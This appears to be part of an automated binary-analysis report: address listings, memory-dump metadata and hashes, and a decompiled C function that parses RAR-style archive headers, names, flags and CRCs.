0x0085d7f2
0x0085d7f4
0x0085d7f4
0x0085d7f4
0x0085d7f2
0x0085d7f9
0x0085d7fa
0x0085d7fc
0x0085d7fe
0x0085d7fe
0x0085d800
0x0085d806
0x0085d80c
0x0085d80e
0x0085d814
0x0085d814
0x0085d81a
0x0085d81c
0x00000000
0x00000000
0x0085d822
0x0085d824
0x0085d826
0x0085d826
0x0085d828
0x0085d828
0x0085d838
0x0085d83f
0x0085d842
0x0085d843
0x0085d845
0x0085d845
0x0085d849
0x0085d84f
0x0085d851
0x0085d853
0x0085d859
0x0085d85c
0x0085d86d
0x0085d870
0x0085d876
0x0085d88b
0x0085d890
0x0085d85e
0x0085d85e
0x0085d865
0x0085d865
0x0085d85c
0x0085d8a1
0x0085d8b0
0x0085d8b1
0x0085d8b1
0x0085d8b3
0x0085d8b5
0x0085d8b5
0x0085d8bb
0x0085d8be
0x0085d8c0
0x0085d8c2
0x0085d8c2
0x0085d8c5
0x0085d8c6
0x0085d8c6
0x0085d8cb
0x0085d8ce
0x0085d8d2
0x0085d8d2
0x0085d8d3
0x0085d8d5
0x0085d8db
0x0085d8e1
0x00000000
0x00000000
0x00000000
0x0085d8e1
0x0085d814
0x0085d8e7
0x0085d8e7
0x00000000
0x0085d8e7
0x0085c66c
0x0085c663
0x0085c65a
0x0085c611
0x0085c615
0x0085c61d
0x00000000
0x0085c61f
0x0085c625
0x0085c62a
0x0085d906
0x0085d906
0x0085d909
0x0085d914
0x0085d93f
0x0085d940
0x0085d941
0x0085d942
0x0085d943
0x0085d944
0x0085d949
0x0085d951
0x0085d956
0x0085d95c
0x0085d961
0x0085d962
0x0085d962
0x0085d962
0x0085d968
0x0085d969
0x0085d969
0x0085d96c
0x0085d972
0x00000000
0x00000000
0x0085d974
0x0085d979
0x0085d97c
0x0085d97e
0x0085d986
0x0085d988
0x0085d98a
0x0085d98f
0x0085d992
0x0085d998
0x0085d99b
0x0085d99d
0x0085d99d
0x0085d99d
0x0085d99d
0x0085d99b
0x0085d9a0
0x0085d9ac
0x0085d9b2
0x0085d9ba
0x0085d9bf
0x0085d9c0
0x0085d9c5
0x0085d9c5
0x0085d9c5
0x0085d9c5
0x0085d9c9
0x0085d9c9
0x0085d9cc
0x0085d9d3
0x0085d9e0
0x0085d916
0x0085d916
0x0085d916
0x0085d920
0x0085d929
0x0085d92e
0x0085d93c
0x0085d93c
0x0085d914
0x0085c61d

APIs

__floor_pentium4.LIBCMT ref: 0085C6F4

Strings

1#SNAN, xrefs: 0085D8F3
1#IND, xrefs: 0085D8EC
1#INF, xrefs: 0085D901
1#QNAN, xrefs: 0085D8FA

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 38bb045769cf6f9446f9e871ecce89477f040347f9d19ccd890b5484dd571aa1
Instruction ID: eb54d72e4e0d02fa4ee2b837ae84a8da34bf0610f9f4ceb16879bd551104e21c
Opcode Fuzzy Hash: 38bb045769cf6f9446f9e871ecce89477f040347f9d19ccd890b5484dd571aa1
Instruction Fuzzy Hash: CDC21872E046288FDB35CE289D407EAB7B5FB48346F1541EAD84DE7240E774AE898F41

Uniqueness

Uniqueness Score: -1.00%

Function 0083277D, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 792
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0083277D(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t341;
				signed int _t345;
				char _t364;
				signed short _t371;
				signed int _t376;
				signed int _t384;
				signed char _t386;
				char _t406;
				signed int _t407;
				signed int _t411;
				signed char _t425;
				intOrPtr _t426;
				char _t427;
				signed int _t430;
				signed int _t431;
				signed char _t436;
				signed int _t439;
				signed int _t443;
				signed short _t448;
				signed short _t453;
				unsigned int _t458;
				signed int _t461;
				void* _t464;
				signed int _t466;
				signed int _t469;
				void* _t476;
				signed int _t482;
				unsigned int _t486;
				void* _t487;
				void* _t494;
				void* _t495;
				signed char _t501;
				signed int _t515;
				intOrPtr* _t528;
				signed int _t531;
				signed int _t532;
				signed int _t541;
				signed int _t546;
				signed int _t548;
				unsigned int _t557;
				signed int _t559;
				signed int _t572;
				signed char _t574;
				signed int _t575;
				void* _t598;
				signed int _t602;
				signed int _t614;
				signed int _t616;
				signed int _t618;
				unsigned int _t624;
				signed char _t638;
				signed char _t648;
				signed int _t651;
				unsigned int _t652;
				signed int _t655;
				signed int _t656;
				signed int _t658;
				signed int _t659;
				unsigned int _t661;
				signed int _t665;
				void* _t666;
				void* _t673;
				signed int _t676;
				signed int _t677;
				signed char _t678;
				signed int _t681;
				void* _t683;
				signed int _t689;
				signed int _t690;
				void* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t704;
				signed int _t705;
				intOrPtr _t707;
				void* _t708;
				intOrPtr _t717;

				E0084D8C4(E0086121B, __ecx);
				E0084D9C0();
				_t528 = __ecx;
				 *((intOrPtr*)(_t708 + 0x20)) = __ecx;
				E0083C2C0(_t708 + 0x24, __ecx);
				 *((intOrPtr*)(_t708 + 0x1c)) = 0;
				 *((intOrPtr*)(_t708 - 4)) = 0;
				_t665 = 7;
				if( *((intOrPtr*)(__ecx + 0x6cbc)) == 0) {
					L6:
					 *((char*)(_t708 + 0x5e)) = 0;
					L7:
					E0083C4CB(_t648, _t665);
					_t720 =  *((intOrPtr*)(_t708 + 0x3c));
					if( *((intOrPtr*)(_t708 + 0x3c)) != 0) {
						 *(_t528 + 0x21e4) = E0083C306(_t708 + 0x24) & 0x0000ffff;
						 *(_t528 + 0x21f4) = 0;
						_t689 = E0083C2EE(_t708 + 0x24) & 0x000000ff;
						_t341 = E0083C306(_t708 + 0x24) & 0x0000ffff;
						 *(_t528 + 0x21ec) = _t341;
						 *(_t528 + 0x21f4) = _t341 >> 0x0000000e & 0x00000001;
						_t541 = E0083C306(_t708 + 0x24) & 0x0000ffff;
						 *(_t528 + 0x21f0) = _t541;
						 *(_t528 + 0x21e8) = _t689;
						__eflags = _t541 - _t665;
						if(_t541 >= _t665) {
							_t690 = _t689 - 0x73;
							__eflags = _t690;
							if(_t690 == 0) {
								 *(_t528 + 0x21e8) = 1;
							} else {
								_t704 = _t690 - 1;
								__eflags = _t704;
								if(_t704 == 0) {
									 *(_t528 + 0x21e8) = 2;
								} else {
									_t705 = _t704 - 6;
									__eflags = _t705;
									if(_t705 == 0) {
										 *(_t528 + 0x21e8) = 3;
									} else {
										__eflags = _t705 == 1;
										if(_t705 == 1) {
											 *(_t528 + 0x21e8) = 5;
										}
									}
								}
							}
							_t345 =  *(_t528 + 0x21e8);
							 *(_t528 + 0x21dc) = _t345;
							__eflags = _t345 - 0x75;
							if(_t345 != 0x75) {
								__eflags = _t345 - 1;
								if(_t345 != 1) {
									L23:
									_push(_t541 - 7);
									L24:
									E0083C4CB(_t648);
									 *((intOrPtr*)(_t528 + 0x6ca8)) =  *((intOrPtr*)(_t528 + 0x6ca0)) + E008318D9(_t528,  *(_t528 + 0x21f0));
									_t546 =  *(_t528 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t528 + 0x6cac) =  *(_t528 + 0x6ca4);
									 *(_t708 + 0x50) = _t546;
									__eflags = _t546 - 1;
									if(__eflags == 0) {
										_t666 = _t528 + 0x2208;
										E0083AA10(_t666);
										_t548 = 5;
										memcpy(_t666, _t528 + 0x21e4, _t548 << 2);
										 *(_t528 + 0x221c) = E0083C306(_t708 + 0x24);
										_t648 = E0083C33B(_t708 + 0x24);
										 *(_t528 + 0x2220) = _t648;
										 *(_t528 + 0x6cb5) =  *(_t528 + 0x2210) & 0x00000001;
										 *(_t528 + 0x6cb4) =  *(_t528 + 0x2210) >> 0x00000003 & 0x00000001;
										_t557 =  *(_t528 + 0x2210);
										 *(_t528 + 0x6cb7) = _t557 >> 0x00000002 & 0x00000001;
										 *(_t528 + 0x6cbb) = _t557 >> 0x00000006 & 0x00000001;
										 *(_t528 + 0x6cbc) = _t557 >> 0x00000007 & 0x00000001;
										__eflags = _t648;
										if(_t648 != 0) {
											L119:
											_t364 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t528 + 0x6cb8)) = _t364;
											 *(_t528 + 0x2224) = _t557 >> 0x00000001 & 0x00000001;
											_t559 = _t557 >> 0x00000004 & 0x00000001;
											__eflags = _t559;
											 *(_t528 + 0x6cb9) = _t557 >> 0x00000008 & 0x00000001;
											 *(_t528 + 0x6cba) = _t559;
											L121:
											_t665 = 7;
											L122:
											_t371 = E0083C3EC(_t708 + 0x24, 0);
											__eflags =  *(_t528 + 0x21e4) - (_t371 & 0x0000ffff);
											if( *(_t528 + 0x21e4) == (_t371 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t708 + 0x1c)) =  *((intOrPtr*)(_t708 + 0x3c));
												goto L133;
											}
											_t376 =  *(_t528 + 0x21e8);
											__eflags = _t376 - 0x79;
											if(_t376 == 0x79) {
												goto L132;
											}
											__eflags = _t376 - 0x76;
											if(_t376 == 0x76) {
												goto L132;
											}
											__eflags = _t376 - 5;
											if(_t376 != 5) {
												L130:
												 *((char*)(_t528 + 0x6cc4)) = 1;
												E00836F18(0x8700e0, 3);
												__eflags =  *((char*)(_t708 + 0x5e));
												if(__eflags == 0) {
													goto L132;
												}
												E00831F29(__eflags, 4, _t528 + 0x1e, _t528 + 0x1e);
												 *((char*)(_t528 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t528 + 0x45ae);
											if( *(_t528 + 0x45ae) == 0) {
												goto L130;
											}
											 *((intOrPtr*)(_t708 + 4)) = _t528;
											 *((intOrPtr*)(_t708 + 0xc)) =  *((intOrPtr*)( *_t528 + 0x14))();
											 *(_t708 + 0x10) = _t648;
											 *((char*)(_t708 - 4)) = 1;
											_t384 =  *((intOrPtr*)( *_t528 + 0x14))() - _t665;
											__eflags = _t384;
											asm("sbb edx, ecx");
											 *((intOrPtr*)( *_t528 + 0x10))(_t384, _t648, 0);
											 *(_t708 + 0x5f) = 1;
											do {
												_t386 = E008397CF(_t528);
												asm("sbb al, al");
												 *(_t708 + 0x5f) =  *(_t708 + 0x5f) &  !( ~_t386);
												_t665 = _t665 - 1;
												__eflags = _t665;
											} while (_t665 != 0);
											 *((char*)(_t708 - 4)) = 0;
											E0083168F(_t708 + 4);
											__eflags =  *(_t708 + 0x5f);
											if( *(_t708 + 0x5f) != 0) {
												goto L132;
											}
											goto L130;
										}
										_t364 = 0;
										__eflags =  *(_t528 + 0x221c);
										if( *(_t528 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t528 + 0x21ec) & 0x00008000;
										if(( *(_t528 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t528 + 0x6ca8)) =  *((intOrPtr*)(_t528 + 0x6ca8)) + E0083C33B(_t708 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t546 - 3;
									if(_t546 <= 3) {
										__eflags = _t546 - 2;
										_t64 = (0 | _t546 != 0x00000002) - 1; // -1
										_t673 = (_t64 & 0xffffdcb0) + 0x45d0 + _t528;
										 *(_t708 + 0x48) = _t673;
										E0083A976(_t673, 0);
										_t572 = 5;
										memcpy(_t673, _t528 + 0x21e4, _t572 << 2);
										_t695 =  *(_t708 + 0x48);
										_t676 =  *(_t708 + 0x50);
										_t574 =  *(_t695 + 8);
										 *(_t695 + 0x1098) =  *(_t695 + 8) & 1;
										 *(_t695 + 0x1099) = _t574 >> 0x00000001 & 1;
										 *(_t695 + 0x109b) = _t574 >> 0x00000002 & 1;
										 *(_t695 + 0x10a0) = _t574 >> 0x0000000a & 1;
										__eflags = _t676 - 2;
										if(_t676 != 2) {
											L35:
											_t651 = 0;
											__eflags = 0;
											_t406 = 0;
											L36:
											 *((char*)(_t695 + 0x10f0)) = _t406;
											__eflags = _t676 - 2;
											if(_t676 == 2) {
												L39:
												_t407 = _t651;
												L40:
												 *(_t695 + 0x10fa) = _t407;
												_t575 = _t574 & 0x000000e0;
												__eflags = _t575 - 0xe0;
												 *((char*)(_t695 + 0x10f1)) = 0 | _t575 == 0x000000e0;
												__eflags = _t575 - 0xe0;
												if(_t575 != 0xe0) {
													_t652 =  *(_t695 + 8);
													_t411 = 0x10000 << (_t652 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t411 = _t651;
													_t652 =  *(_t695 + 8);
												}
												 *(_t695 + 0x10f4) = _t411;
												 *(_t695 + 0x10f3) = _t652 >> 0x0000000b & 0x00000001;
												 *(_t695 + 0x10f2) = _t652 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t695 + 0x14)) = E0083C33B(_t708 + 0x24);
												 *(_t708 + 0x54) = E0083C33B(_t708 + 0x24);
												 *((char*)(_t695 + 0x18)) = E0083C2EE(_t708 + 0x24);
												 *(_t695 + 0x1070) = 2;
												 *((intOrPtr*)(_t695 + 0x1074)) = E0083C33B(_t708 + 0x24);
												 *(_t708 + 0x18) = E0083C33B(_t708 + 0x24);
												 *(_t695 + 0x1c) = E0083C2EE(_t708 + 0x24) & 0x000000ff;
												 *((char*)(_t695 + 0x20)) = E0083C2EE(_t708 + 0x24) - 0x30;
												 *(_t708 + 0x4c) = E0083C306(_t708 + 0x24) & 0x0000ffff;
												_t425 = E0083C33B(_t708 + 0x24);
												_t655 =  *(_t695 + 0x1c);
												 *(_t708 + 0x58) = _t425;
												 *(_t695 + 0x24) = _t425;
												__eflags = _t655 - 0x14;
												if(_t655 < 0x14) {
													__eflags = _t425 & 0x00000010;
													if((_t425 & 0x00000010) != 0) {
														 *((char*)(_t695 + 0x10f1)) = 1;
													}
												}
												 *(_t695 + 0x109c) = 0;
												__eflags =  *(_t695 + 0x109b);
												if( *(_t695 + 0x109b) == 0) {
													L55:
													_t426 =  *((intOrPtr*)(_t695 + 0x18));
													 *(_t695 + 0x10fc) = 2;
													__eflags = _t426 - 3;
													if(_t426 == 3) {
														L59:
														 *(_t695 + 0x10fc) = 1;
														L60:
														 *(_t695 + 0x1100) = 0;
														__eflags = _t426 - 3;
														if(_t426 == 3) {
															__eflags = ( *(_t708 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t708 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t695 + 0x1100) = 1;
																 *((short*)(_t695 + 0x1104)) = 0;
															}
														}
														__eflags = _t676 - 2;
														if(_t676 == 2) {
															L66:
															_t427 = 0;
															goto L67;
														} else {
															__eflags =  *(_t695 + 0x24);
															if( *(_t695 + 0x24) >= 0) {
																goto L66;
															}
															_t427 = 1;
															L67:
															 *((char*)(_t695 + 0x10f8)) = _t427;
															_t430 =  *(_t695 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t430;
															 *(_t695 + 0x10f9) = _t430;
															if(_t430 == 0) {
																__eflags =  *(_t708 + 0x54) - 0xffffffff;
																_t648 = 0;
																_t677 = 0;
																_t137 =  *(_t708 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t431 = _t430 & 0xffffff00 | _t137;
																L73:
																 *(_t695 + 0x109a) = _t431;
																 *((intOrPtr*)(_t695 + 0x1058)) = 0 +  *((intOrPtr*)(_t695 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t695 + 0x105c)) = _t677;
																asm("adc edx, ecx");
																 *(_t695 + 0x1060) = 0 +  *(_t708 + 0x54);
																__eflags =  *(_t695 + 0x109a);
																 *(_t695 + 0x1064) = _t648;
																if( *(_t695 + 0x109a) != 0) {
																	 *(_t695 + 0x1060) = 0x7fffffff;
																	 *(_t695 + 0x1064) = 0x7fffffff;
																}
																_t436 =  *(_t708 + 0x4c);
																_t678 = 0x1fff;
																 *(_t708 + 0x54) = 0x1fff;
																__eflags = _t436 - 0x1fff;
																if(_t436 < 0x1fff) {
																	_t678 = _t436;
																	 *(_t708 + 0x54) = _t436;
																}
																E0083C39D(_t708 + 0x24, _t708 - 0x2030, _t678);
																_t439 = 0;
																__eflags =  *(_t708 + 0x50) - 2;
																 *((char*)(_t708 + _t678 - 0x2030)) = 0;
																if( *(_t708 + 0x50) != 2) {
																	 *(_t708 + 0x50) = _t695 + 0x28;
																	_t442 = E00841006(_t708 - 0x2030, _t695 + 0x28, 0x800);
																	_t681 =  *((intOrPtr*)(_t695 + 0xc)) -  *(_t708 + 0x4c) - 0x20;
																	__eflags =  *(_t695 + 8) & 0x00000400;
																	if(( *(_t695 + 8) & 0x00000400) != 0) {
																		_t681 = _t681 - 8;
																		__eflags = _t681;
																	}
																	__eflags = _t681;
																	if(_t681 <= 0) {
																		_t682 = _t695 + 0x28;
																	} else {
																		 *(_t708 + 0x58) = _t695 + 0x1028;
																		E00831FC9(_t695 + 0x1028, _t681);
																		_t476 = E0083C39D(_t708 + 0x24,  *(_t695 + 0x1028), _t681);
																		_t682 = _t695 + 0x28;
																		_t442 = E00852BC9(_t476, _t695 + 0x28, L"RR");
																		__eflags = _t442;
																		if(_t442 == 0) {
																			__eflags =  *((intOrPtr*)(_t695 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t695 + 0x102c)) >= 0x14) {
																				_t683 =  *( *(_t708 + 0x58));
																				asm("cdq");
																				_t614 =  *(_t683 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t616 = (_t614 << 8) + ( *(_t683 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t618 = (_t616 << 8) + ( *(_t683 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t482 = (_t618 << 8) + ( *(_t683 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t528 + 0x21c0) = _t482 << 9;
																				 *(_t528 + 0x21c4) = ((((_t648 << 0x00000020 | _t614) << 0x8 << 0x00000020 | _t616) << 0x8 << 0x00000020 | _t618) << 0x8 << 0x00000020 | _t482) << 9;
																				_t486 = E0083F77F( *(_t528 + 0x21c0),  *(_t528 + 0x21c4),  *((intOrPtr*)( *_t528 + 0x14))(), _t648);
																				 *(_t528 + 0x21c8) = _t486;
																				 *(_t708 + 0x58) = _t486;
																				_t487 = E0084D910(_t485, _t648, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t442 = E0083F77F(_t487 +  *(_t528 + 0x21c0), _t648, _t485, _t648);
																				_t624 =  *(_t708 + 0x58);
																				_t695 =  *(_t708 + 0x48);
																				_t682 =  *(_t708 + 0x50);
																				__eflags = _t442 - _t624;
																				if(_t442 > _t624) {
																					_t442 = _t624 + 1;
																					 *(_t528 + 0x21c8) = _t624 + 1;
																				}
																			}
																		}
																	}
																	_t443 = E00852BC9(_t442, _t682, L"CMT");
																	__eflags = _t443;
																	if(_t443 == 0) {
																		 *((char*)(_t528 + 0x6cb6)) = 1;
																	}
																} else {
																	_t625 = 0;
																	_t682 = _t695 + 0x28;
																	 *_t682 = 0;
																	__eflags =  *(_t695 + 8) & 0x00000200;
																	if(( *(_t695 + 8) & 0x00000200) != 0) {
																		E00836B0D(_t708);
																		_t494 = E00852C10(_t708 - 0x2030);
																		_t648 =  *(_t708 + 0x54);
																		_t495 = _t494 + 1;
																		_pop(_t625);
																		__eflags = _t648 - _t495;
																		if(_t648 > _t495) {
																			__eflags = _t495 + _t708 - 0x2030;
																			_t625 = _t708;
																			E00836B1E(_t708, _t708 - 0x2030, _t648, _t495 + _t708 - 0x2030, _t648 - _t495, _t682, 0x800);
																		}
																		_t439 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t682 - _t439;
																	if( *_t682 == _t439) {
																		_push(1);
																		_push(0x800);
																		_push(_t682);
																		_push(_t708 - 0x2030);
																		E0083F7D5(_t625);
																	}
																	E00832028(_t528, _t695);
																}
																__eflags =  *(_t695 + 8) & 0x00000400;
																if(( *(_t695 + 8) & 0x00000400) != 0) {
																	E0083C39D(_t708 + 0x24, _t695 + 0x10a1, 8);
																}
																E008408DA( *(_t708 + 0x18));
																__eflags =  *(_t695 + 8) & 0x00001000;
																if(( *(_t695 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t528 + 0x6ca8)) = E00833DB9( *((intOrPtr*)(_t528 + 0x6ca8)),  *(_t528 + 0x6cac),  *((intOrPtr*)(_t695 + 0x1058)),  *((intOrPtr*)(_t695 + 0x105c)), 0, 0);
																	 *(_t528 + 0x6cac) = _t648;
																	 *((char*)(_t708 + 0x20)) =  *(_t695 + 0x10f2);
																	_t448 = E0083C3EC(_t708 + 0x24,  *((intOrPtr*)(_t708 + 0x20)));
																	__eflags =  *_t695 - (_t448 & 0x0000ffff);
																	if( *_t695 != (_t448 & 0x0000ffff)) {
																		 *((char*)(_t528 + 0x6cc4)) = 1;
																		E00836F18(0x8700e0, 1);
																		__eflags =  *((char*)(_t708 + 0x5e));
																		if(__eflags == 0) {
																			E00831F29(__eflags, 0x1c, _t528 + 0x1e, _t682);
																		}
																	}
																	goto L121;
																} else {
																	_t453 = E0083C306(_t708 + 0x24);
																	 *((intOrPtr*)(_t708 + 4)) = _t528 + 0x32c0;
																	 *((intOrPtr*)(_t708 + 8)) = _t528 + 0x32c8;
																	 *((intOrPtr*)(_t708 + 0xc)) = _t528 + 0x32d0;
																	__eflags = 0;
																	_t696 = 0;
																	 *(_t708 + 0x10) = 0;
																	_t458 = _t453 & 0x0000ffff;
																	 *(_t708 + 0x4c) = 0;
																	 *(_t708 + 0x58) = _t458;
																	do {
																		_t598 = 3;
																		_t531 = _t458 >> _t598 - _t696 << 2;
																		__eflags = _t531 & 0x00000008;
																		if((_t531 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t708 + 4 + _t696 * 4);
																		if( *(_t708 + 4 + _t696 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t696;
																		if(__eflags != 0) {
																			E008408DA(E0083C33B(_t708 + 0x24));
																		}
																		E00840708( *(_t708 + 4 + _t696 * 4), _t648, __eflags, _t708 - 0x30);
																		__eflags = _t531 & 0x00000004;
																		if((_t531 & 0x00000004) != 0) {
																			_t249 = _t708 - 0x1c;
																			 *_t249 =  *(_t708 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t602 = 0;
																		 *(_t708 - 0x18) = 0;
																		_t532 = _t531 & 0x00000003;
																		__eflags = _t532;
																		if(_t532 <= 0) {
																			L109:
																			_t461 = _t602 * 0x64;
																			__eflags = _t461;
																			 *(_t708 - 0x18) = _t461;
																			E00840938( *(_t708 + 4 + _t696 * 4), _t648, _t708 - 0x30);
																			_t458 =  *(_t708 + 0x58);
																		} else {
																			_t464 = 3;
																			_t466 = _t464 - _t532 << 3;
																			__eflags = _t466;
																			 *(_t708 + 0x18) = _t466;
																			_t697 = _t466;
																			do {
																				_t469 = (E0083C2EE(_t708 + 0x24) & 0x000000ff) << _t697;
																				_t697 = _t697 + 8;
																				_t602 =  *(_t708 - 0x18) | _t469;
																				 *(_t708 - 0x18) = _t602;
																				_t532 = _t532 - 1;
																				__eflags = _t532;
																			} while (_t532 != 0);
																			_t696 =  *(_t708 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t696 = _t696 + 1;
																		 *(_t708 + 0x4c) = _t696;
																		__eflags = _t696 - 4;
																	} while (_t696 < 4);
																	_t528 =  *((intOrPtr*)(_t708 + 0x20));
																	_t695 =  *(_t708 + 0x48);
																	goto L112;
																}
															}
															_t677 = E0083C33B(_t708 + 0x24);
															_t501 = E0083C33B(_t708 + 0x24);
															__eflags =  *(_t708 + 0x54) - 0xffffffff;
															_t648 = _t501;
															if( *(_t708 + 0x54) != 0xffffffff) {
																L71:
																_t431 = 0;
																goto L73;
															}
															__eflags = _t648 - 0xffffffff;
															if(_t648 != 0xffffffff) {
																goto L71;
															}
															_t431 = 1;
															goto L73;
														}
													}
													__eflags = _t426 - 5;
													if(_t426 == 5) {
														goto L59;
													}
													__eflags = _t426 - 6;
													if(_t426 < 6) {
														 *(_t695 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t656 = _t655 - 0xd;
													__eflags = _t656;
													if(_t656 == 0) {
														 *(_t695 + 0x109c) = 1;
														goto L55;
													}
													_t658 = _t656;
													__eflags = _t658;
													if(_t658 == 0) {
														 *(_t695 + 0x109c) = 2;
														goto L55;
													}
													_t659 = _t658 - 5;
													__eflags = _t659;
													if(_t659 == 0) {
														L52:
														 *(_t695 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t659 == 6;
													if(_t659 == 6) {
														goto L52;
													}
													 *(_t695 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t574 & 0x00000010;
											if((_t574 & 0x00000010) == 0) {
												goto L39;
											}
											_t407 = 1;
											goto L40;
										}
										__eflags = _t574 & 0x00000010;
										if((_t574 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t406 = 1;
											_t651 = 0;
											goto L36;
										}
									}
									__eflags = _t546 - 5;
									if(_t546 != 5) {
										goto L115;
									} else {
										memcpy(_t528 + 0x4590, _t528 + 0x21e4, _t546 << 2);
										_t661 =  *(_t528 + 0x4598);
										 *(_t528 + 0x45ac) =  *(_t528 + 0x4598) & 0x00000001;
										_t638 = _t661 >> 0x00000001 & 0x00000001;
										_t648 = _t661 >> 0x00000003 & 0x00000001;
										 *(_t528 + 0x45ad) = _t638;
										 *(_t528 + 0x45ae) = _t661 >> 0x00000002 & 0x00000001;
										 *(_t528 + 0x45af) = _t648;
										__eflags = _t638;
										if(_t638 != 0) {
											 *((intOrPtr*)(_t528 + 0x45a4)) = E0083C33B(_t708 + 0x24);
										}
										__eflags =  *(_t528 + 0x45af);
										if( *(_t528 + 0x45af) != 0) {
											_t515 = E0083C306(_t708 + 0x24) & 0x0000ffff;
											 *(_t528 + 0x45a8) = _t515;
											 *(_t528 + 0x6cd8) = _t515;
										}
										goto L121;
									}
								}
								__eflags =  *(_t528 + 0x21ec) & 0x00000002;
								if(( *(_t528 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E00831FE3(_t528);
							L133:
							E0083158D(_t708 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
							return  *((intOrPtr*)(_t708 + 0x1c));
						}
					}
					L8:
					E00833EBD(_t528, _t648, _t720);
					goto L133;
				}
				_t648 =  *((intOrPtr*)(__ecx + 0x6cc0)) + _t665;
				asm("adc eax, ecx");
				_t717 =  *((intOrPtr*)(__ecx + 0x6ca4));
				if(_t717 < 0 || _t717 <= 0 &&  *((intOrPtr*)(__ecx + 0x6ca0)) <= _t648) {
					goto L6;
				} else {
					 *((char*)(_t708 + 0x5e)) = 1;
					E00833D52(_t528);
					_push(8);
					_push(_t708 + 0x14);
					if( *((intOrPtr*)( *_t528 + 0xc))() != 8) {
						goto L8;
					} else {
						_t707 = _t528 + 0x1024;
						E008361AA(_t707, 0, 4,  *((intOrPtr*)(_t528 + 0x21bc)) + 0x5024, _t708 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t708 + 0x44)) = _t707;
						goto L7;
					}
				}
			}

0x00832786
0x00832790
0x00832797
0x0083279e
0x008327a1
0x008327aa
0x008327ad
0x008327b0
0x008327b7
0x0083281f
0x0083281f
0x00832822
0x00832826
0x0083282b
0x0083282f
0x0083284b
0x00832851
0x00832860
0x00832868
0x0083286e
0x00832879
0x00832884
0x00832887
0x0083288d
0x00832893
0x00832895
0x008328a3
0x008328a3
0x008328a6
0x008328db
0x008328a8
0x008328a8
0x008328a8
0x008328ab
0x008328cf
0x008328ad
0x008328ad
0x008328ad
0x008328b0
0x008328c3
0x008328b2
0x008328b2
0x008328b5
0x008328b7
0x008328b7
0x008328b5
0x008328b0
0x008328ab
0x008328e5
0x008328eb
0x008328f1
0x008328f4
0x008328fa
0x008328fd
0x00832908
0x0083290b
0x0083290c
0x0083290f
0x0083292f
0x00832935
0x0083293b
0x0083293e
0x00832944
0x00832947
0x0083294a
0x00833063
0x0083306b
0x00833072
0x00833079
0x00833086
0x00833098
0x0083309d
0x008330a3
0x008330b5
0x008330bb
0x008330c8
0x008330d5
0x008330e2
0x008330e8
0x008330ea
0x008330f7
0x008330f9
0x008330f9
0x008330fa
0x008330fa
0x00833106
0x00833116
0x00833116
0x00833119
0x0083311f
0x00833125
0x00833127
0x00833128
0x0083312d
0x00833135
0x0083313b
0x008331eb
0x008331ee
0x00000000
0x008331ee
0x00833141
0x00833147
0x0083314a
0x00000000
0x00000000
0x00833150
0x00833153
0x00000000
0x00000000
0x00833159
0x0083315c
0x008331bd
0x008331c4
0x008331cb
0x008331d0
0x008331d4
0x00000000
0x00000000
0x008331dd
0x008331e2
0x00000000
0x008331e2
0x0083315e
0x00833165
0x00000000
0x00000000
0x0083316b
0x00833171
0x00833174
0x0083317b
0x00833186
0x00833186
0x00833189
0x0083318f
0x00833192
0x00833196
0x00833198
0x0083319f
0x008331a3
0x008331a6
0x008331a6
0x008331a6
0x008331ae
0x008331b2
0x008331b7
0x008331bb
0x00000000
0x00000000
0x00000000
0x008331bb
0x008330ec
0x008330ee
0x008330f5
